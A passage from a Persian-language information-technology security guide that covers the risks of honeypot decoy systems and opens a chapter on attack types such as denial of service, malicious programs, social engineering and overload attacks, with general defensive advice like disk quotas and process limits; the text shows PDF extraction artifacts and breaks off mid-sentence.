‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻏﻨﻲ ﻭ ﺟﺬﺍﺏ ﺑﺎﺷﺪ‪ ،‬ﻛﺎﻭﺵ ﺩﺭ ﺁﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﻭﻗﺖ ﻣﻬﺎﺟﻢ ﺭﺍ ﺑﮕﻴﺮﺩ ﻛﻪ‬ ‫‪.٢‬‬
‫ﺩﻳﮕﺮ ﻓﺮﺻﺘﻲ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﭘﻴﺪﺍ ﻧﻜﻨﺪ‪.‬‬
‫ﻼ ﺍﻃﻤﻴﻨﺎﻥ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻓﺎﺭﻍ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻄﻠﺐ ﻣﻬﻤﻲ ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻴﺎﺑﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﻣ ﹰ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻴﭻ ﭼﻴﺰﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺿﺮﺑﻪ ﺯﺩﻥ ﺑﻪ ﺷﻤﺎ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺧﺼﻮﺻﹰﺎ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﻧﺒﺎﻳﺪ ﻫﻴﭻ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺎﺋﻞ‬
‫ﻣﻲﺗﻮﺍﻥ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻧﻮ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﻜﺎﺭ ﺑﺮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺠﻬﺰ ﺑﺎﺷﺪ‪ ،‬ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﺑﺎﻳﺪ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺁﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻣﺨﺎﻃﺮﺓ ﺩﻭﻡ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺁﻧﻬﺎ ﺑﻌﻨﻮﺍﻥ ﺳﻜﻮﻳﻲ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺷﻮﺩ‪ ،‬ﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺪﻧﻲ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ ﺑﻪ ﺷﺨﺺ ﺛﺎﻟﺚ ﻭ ﻳﺎ ﺣﺘﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺟﺰﺍﺋﻲ ﺗﻮﻃﺌﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺑﺮﻋﻬﺪﻩ‬
‫ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺑﺪﻟﻴﻞ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﺑﺮﭘﺎﻳﻲ ﻫﺮﮔﻮﻧﻪ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﻳﺎ ﻛﻮﺯﺓ ﻋﺴﻞ ﺑﺪﻗﺖ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺗﺮﺟﻴﺤﹰﺎ ﺑﺎ ﻳﻚ ﺣﻘﻮﻗﺪﺍﻥ ﺯﺑﺪﻩ ﻧﻴﺰ‬
‫ﻣﺸﻮﺭﺕ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪٤٠٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﻫﺸﺘﻢ‬
‫ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻓﻨﻮﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﻪ ﺳﻪ ﺩﺳﺘﺔ ﻣﺠﺰﺍ‬
‫ﺗﻘﺴﻴﻢ ﻣﻲﺷﻮﻧﺪ‪:‬‬

‫ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬


‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ‪ .‬ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﻜﻪ‪ ،‬ﺣﺘﻲ ﺑﺪﻭﻥ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﭘﺬﻳﺮﺩ‪ .‬ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﻭ ﺗﺴﺨﻴﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ ﺩﺍﺭﻧﺪ‪.‬‬

‫ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ‬
‫ﺭﺍﻩ ﺩﻳﮕﺮ ﺗﺴﺨﻴﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ‪ ،‬ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﺗﻮﺳـﻂ‬
‫ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﺳﺮﻭﻳﺴﻬﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻧﺼﺐ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻛﻨﺘﺮﻝ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﻣﻬﺎﺟﻢ ﻣﻲﺩﻫﺪ؛ ﻭ ﺑﺮﺧـﻲ ﺩﻳﮕـﺮ‬
‫ﺗﻜﺜﻴﺮ ﻳﺎﻓﺘﻪ ﻭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺘﻘﺎﻝ ﻣﻲﻳﺎﺑﻨﺪ‪.‬‬
‫‪٣٠١‬‬
‫ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‬
‫ﺩﺭ ﻳﻚ ﺣﻤﻠﺔ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‪ ،‬ﻣﻬﺎﺟﻢ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻃﺒﻴﻌﻲ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺁﻧﻬﺎ‬
‫ﺭﺍ ﺑﻪ ﻓﺎﺵ ﻛﺮﺩﻥ ﺍﺳﺮﺍﺭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎﻱ ﻣﺨﻞ ﺍﻣﻨﻴﺖ ﻭﺍﺩﺍﺭﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﻫﺮ ﻳﻚ ﺍﺯ ﺍﻧﻮﺍﻉ ﺍﻳﻦ ﺣﻤﻼﺕ ﺑﻪ ﻫﻤﺮﺍﻩ ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‬


‫ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ‪ ،‬ﺣﻤﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﺁﻧﻘﺪﺭ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﺓ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﭼﻴﺰﻱ‬
‫ﻲ‪ ٣٠٢‬ﻣﻨﺎﺑﻊ ﺭﺍ ﻣﻮﺭﺩ ﻫﺠﻮﻡ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﺑﺎﻗﻲ ﻧﻤﻲﻣﺎﻧﺪ‪ .‬ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻼﺕ‪ ،‬ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳ ﹺ‬
‫ﭘﺮﺩﺍﺯﻩﻫﺎ‪ ،‬ﻓﻀﺎﻱ ﺩﻳﺴﻚ‪ ،‬ﺯﻣﺎﻥ ﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻛﺎﻏﺬ ﭼﺎﭘﮕﺮ‪ ،‬ﻣﻮﺩﻡ ﻭ ﻳﺎ ﻭﻗﺖ ﺭﺍﻫﺒﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ ﺑﺎﺷﻨﺪ‪ .‬ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﺣﻤﻠﻪ ﻣﺨﺘﻞ ﺷﺪﻥ‬
‫ﻭ ﻳﺎ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺳﺮﻭﻳﺲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺩﻭ ﻧﻮﻉ ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﮐﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬﺎ ﭘﺮﺩﺍﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫‪301 Social Engineering‬‬


‫‪302 Availability‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤١٠‬‬

‫‪٣٠٣‬‬
‫ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ‬
‫ﻼ ﺍﺯ ﻛﺎﺭ‬
‫ﭼﻨﻴﻦ ﺣﻤﻠﻪﻫﺎﻳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺻﺪﻣﻪ ﻣﻲﺯﻧﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﺭﺍ ﺗﺨﺮﻳﺐ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﺷﻤﺎ ﺩﻳﮕﺮ ﻧﻤﻲ ﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩﻛﻨﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺩﻳﺴﻚ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ‪.‬‬
‫ﺭﺍﻫﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻭ ﻳﺎ ﺍﻳﺠﺎﺩ ﺍﺧﺘﻼﻝ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻣﻨﺠﺮ ﺷﻮﺩ‪ .‬ﻣﻲﺗﻮﺍﻥ ﺑﺎ‬
‫ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ‪ ،‬ﺗﻘﺮﻳﺒﹰﺎ ﺍﺯ ﺗﻤﺎﻣﻲ ﺣﻤﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﻬﺮﻩ ﺑﺒﺮﻳﺪ‪ ،‬ﺧﻮﺩ ﺑﻪ ﺧﻮﺩ ﺍﺯ ﻭﻗﻮﻉ ﺍﻳﻦ ﻗﺒﻴﻞ ﺣﻤﻼﺕ‬
‫ﻣﺨﺮﺏ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ‪.‬‬

‫‪٣٠٤‬‬
‫ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ‬
‫ﺍﻳﻨﮕﻮﻧﻪ ﺣﻤﻼﺕ‪ ،‬ﺑﺎﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺑﺮﺧﻲ ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻢ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭ ﻳﺎ ﺗﻤﺎﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺑﺮﺧﻲ ﻣﻨﺎﺑﻊ ﺭﺍ ﻣﺼﺮﻑ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ‬
‫ﺟﻠﻮﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺩﻳﮕﺮﺍﻥ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺭﺍ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﻧﻮﻉ ﺑﺎﺭﮔﺬﺍﺭﻱ‪ ،‬ﭘﺮﻛﺮﺩﻥ ﻳﻚ ‪ partition‬ﺍﺯ ﺩﻳﺴﻚ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻧﺘﻴﺠﺔ ﺁﻥ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺎﺭﮔﺬﺍﺭﻱ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻤﺒﺎﺭﺍﻥ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫ﺷﺒﻜﻪ ﺑﺎ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺑﻴﺸﻤﺎﺭ ﺑﺎﺷﺪ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻗﺎﺩﺭ ﺑﻪ ﭘﺮﺩﺍﺯﺵ ﺁﻧﻬﺎ ﻧﺒﺎﺷﺪ؛ ﻭ ﻳﺎ ﻣﺸﻐﻮﻝ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻳﻚ‬
‫ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪﻱ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴﺪ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺟﺪﻳﺪ‪ ،‬ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻳﻨﮕﻮﻧﻪ ﺣﻤﻼﺕ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﺎﺩﺭ ﺑﻪ ﻣﺤﺪﻭﺩ‬
‫ﻛﺮﺩﻥ ﺣﺪﺍﻛﺜﺮ ﺗﻌﺪﺍﺩ ﻣﺠﺎﺯ ﭘﺮﺩﺍﺯﻩﻫﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﻛﺎﺭﺑﺮ‪ ،‬ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﻣﺨﺘﺺ ﻫﺮ ﻛﺎﺭﺑﺮ‪ ،‬ﻭ ﻳﺎ ﺣﺘﻲ ﻣﻴﺰﺍﻥ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻛﻪ ﻫﺮ‬
‫ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺼﺮﻑ ﻛﻨﺪ ﺑﺎﺷﻴﺪ‪ .‬ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺟﻬﺖ ﺳﺮﻋﺖ ﻭ ﺯﻣﺎﻥ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻣﺤﺪﻭﺩ ﻛﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻨﻮﺯ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﻪﻫﺎﻱ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺗﻨﻈﻴﻤﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻋﻤﻮﻣﹰﺎ ﺍﻧﺠﺎﻡ ﻧﮕﺮﻓﺘﻪ ﻭ ﻳﺎ ﺑﻪ‬
‫ﺩﺭﺳﺘﻲ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ‪.‬‬
‫ﺲ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﺑﺎ‬ ‫ﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ" )ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﺑﺤﺚ‪ ،‬ﺁﻧﺮﺍ ﺑﻪ ﺍﺧﺘﺼﺎﺭ "ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ" ﻣﻲﻧﺎﻣﻴﻢ(‪ ،‬ﻳﻚ ﻣﻨﺒﻊ ﻳﺎ ﺳﺮﻭﻳ ﹺ‬ ‫ﺩﺭ ﺣﻤﻠﺔ "ﺑﺎﺭﮔﺬﺍﺭ ﹺ‬
‫ﻲ ﺑﻴﺸﻤﺎﺭﻱ ﻣﺸﻐﻮﻝ ﻣﻲﺷﻮﺩ‪ ،‬ﺗﺎ ﺟﺎﺋﻴﻜﻪ ﺍﺯ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺣﻘﻴﻘﻲ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﺯ ﻣﻲﻣﺎﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ‬ ‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻏﻴﺮﺣﻘﻴﻘ ﹺ‬
‫ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﭘﺮﺩﺍﺯﻩ ﺍﻳﺠﺎﺩ ﻧﻤﺎﻳﺪ‪ ،‬ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺎﺩﺭ ﺑﻪ ﺍﺟﺮﺍﻱ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺧﻮﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ ،‬ﻭ ﺍﮔﺮ ﻛﺎﺭﺑﺮﻱ ﺩﻳﺴﻜﻬﺎ‬
‫ﺭﺍ ﭘﺮ ﻛﻨﺪ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻌﺮﻳﻒ ﻭ ﺍﻋﻤﺎﻝ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ‬
‫ﻣﺤﺪﻭﺩﻳﺖ ﺩﺭ ﺣﺠﻢ ﻣﺠﺎﺯ ﺩﻳﺴﻚ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ )‪ ،(quota‬ﺗﺎ ﺣﺪﻭﺩﻱ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ‬
‫ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﻌﻨﻮﺍﻥ ﻧﻮﻋﻲ ‪ quota‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻣﺜ ﹰ‬
‫ﻼ ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻪ‬
‫‪partition‬ﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﻘﺴﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﻫﺮ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺤﺪﻭﺩ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ‪ partition‬ﮔﺮﺩﺍﻧﻴﺪ‪ .‬ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﮑﻪ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ‬
